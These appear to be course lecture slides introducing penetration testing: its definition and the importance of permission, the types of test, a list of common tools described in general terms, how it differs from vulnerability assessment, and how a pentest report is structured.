Chapter 05 - Penetration Testing

Dr Faisal Khan
[email protected]
Pen Testing
• Penetration testing is the process of attempting to gain access to resources without
knowledge of usernames, passwords and other normal means of access.
• If the focus is on computer resources, then examples of a successful penetration
would be obtaining or subverting confidential documents, pricelists, databases and
other protected information.
• The main thing that separates a penetration tester from an attacker is permission.
The penetration tester will have permission from the owner of the computing
resources that are being tested and will be responsible to provide a report.
• The goal of a penetration test is to increase the security of the computing resources
being tested.
• In many cases, a penetration tester will be given user-level access and in those
cases, the goal would be to elevate the status of the account or user other means
to gain access to additional information that a user of that level should not have
access to.
• Some penetration testers are contracted to find one hole, but in many cases, they
are expected to keep looking past the first hole so that additional vulnerabilities
can be identified and fixed.
• It is important for the pen-tester to keep detailed notes about how the tests were
done so that the results can be verified and so that any issues that were
uncovered can be resolved.
• It’s important to understand that it is very unlikely that a pen-tester will find all
the security issues.
• As an example, if a penetration test was done yesterday, the organization may
pass the test. However, today is Microsoft’s “patch Tuesday” and now there’s a
brand new vulnerability in some Exchange mail servers that were previously
considered secure, and next month it will be something else.
• Maintaining a secure network and information resources requires constant
vigilance.
Types of Penetration Tests

• Penetration testing can consist of one or more of the following types of tests:
• White Box Tests
• A white box test is one in which organizations provide the penetration testers with a variety
of security information relating to their systems, to help them better find vulnerabilities.
• Blind Tests
• A blind test, known as a black-box test, organizations provide penetration testers with no
security information about the system being penetrated. The goal is to expose
vulnerabilities that would not be detected otherwise.
• Double-Blind Tests
• A double-blind test, which is also known as a covert test, is one in which not only do
organizations not provide penetration testers with security information. They also do not
inform their own computer security teams of the tests. Such tests are typically highly
controlled by those managing them.
Types of Pentests continued..
• External Tests
• An external test is one in which penetration testers attempt to find
vulnerabilities remotely. Because of the nature of these types of tests,
they are performed on external-facing applications such as websites.
• Internal Tests
• An internal test is one in which the penetration testing takes place
within an organization’s premises. These tests typically focus on
security vulnerabilities that someone working from within an
organization could take advantage of.
Top Penetration Testing Software & Tools

• 1. Netsparker
• Netsparker Security Scanner is a popular automatic web application for
penetration testing. The software can identify everything from cross-
site scripting to SQL injection. Developers can use this tool on
websites, web services, and web applications.
• 2. Wireshark
• Once known as Ethereal 0.2.0, Wireshark is an award-winning network
analyzer with 600 authors. With this software, you can quickly capture
and interpret network packets. The tool is open-source and available
for various systems, including Windows, Solaris, FreeBSD, and Linux.
Top Penetration Testing Software & Tools
continued..
• 3. Metasploit
• Metasploit is the most used penetration testing automation framework in the world.
Metasploit helps professional teams verify and manage security assessments, improves
awareness, and arms and empowers defenders to stay a step ahead in the game.
• 4. BeEF
• This is a pen testing tool and is best suited for checking a web browser. Adapted for
combating web-borne attacks and could benefit mobile clients. BeEF stands for Browser
Exploitation Framework.
• 5. John The Ripper Password Cracker
• Passwords are one of the most prominent vulnerabilities. Attackers may use passwords to
steal credentials and enter sensitive systems. John the Ripper is the essential tool for
password cracking and provides a range of systems for this purpose. The pen testing tool
is a free open source software.
Top Penetration Testing Software & Tools
continued..
• 6. W3af
• W3af web application attack and audit frameworks are focused on finding and
exploiting vulnerabilities in all web applications. Three types of plugins are
provided for attack, audit, and discovery. The software then passes these on to the
audit tool to check for flaws in the security.
• 7. Nessus
• Nessus has been used as a security penetration testing tool for twenty years.
27,000 companies utilize the application worldwide. The software is one of the
most powerful testing tools on the market
• 8. SQLmap
• SQLmap is an SQL injection takeover tool for databases. Supported database
platforms include MySQL, SQLite, Sybase, DB2, Access, MSSQL, PostgreSQL.
Pen-Testing vs. Vulnerability
Assessment
• The two terms are related but penetration testing has more of an emphasis on
gaining as much access as possible while vulnerability testing places the emphasis
on identifying areas that are vulnerable to a computer attack.
• It is important to keep in mind that you are dealing with a ‘Test.’ A penetration
test is like any other test in the sense that it is a sampling of all possible systems
and configurations.
• Unless the contractor is hired to test only a single system, they will be unable to
identify and penetrate all possible systems using all possible vulnerabilities.
Why Perform Pen test
• There are a variety of reasons for performing a penetration test. One of the main
reasons is to find vulnerabilities and fix them before an attacker does.
• Sometimes, the IT department is aware of reported vulnerabilities but they need
an outside expert to officially report them so that management will approve the
resources necessary to fix them.
• Having a second set of eyes check out a critical computer system is a good
security practice. Testing a new system before it goes on-line is also a good idea.
• Another reason for a penetration test is to give the IT department at the target
company a chance to respond to an attack.
Find Holes Now Before
Somebody Else Does
• At any given time, attackers are employing any number of automated tools
and network attacks looking for
• ways to penetrate systems.
• Only a handful of those people will have access to 0-day exploits, most will be
using well known attacks and exploits.
• Penetration testing provides IT management with a view of their network
from a malicious point of view.
• The goal is that the penetration tester will find ways into the network so that
they can be fixed before someone with less than honorable intentions
discovers the same holes.
• Report Problems to Management
• Verify Secure Configurations
• Security Training For Network Staff
• Discover Gaps In Compliance
• Testing New Technology
The Penetration Testing Report
• After performing a penetration test, compiling the results from the test into a
legible format is key.
• As many key decision makers are not overly technical, it is critically important to
have multiple sections to a report.
• One common structure for penetration testing reports is to include an Executive
Summary, a Management Summary that includes some high-level operational
details such as server IP addresses and what needs to be fixed immediately, and a
Technical Summary with very specific results and remediation suggestions.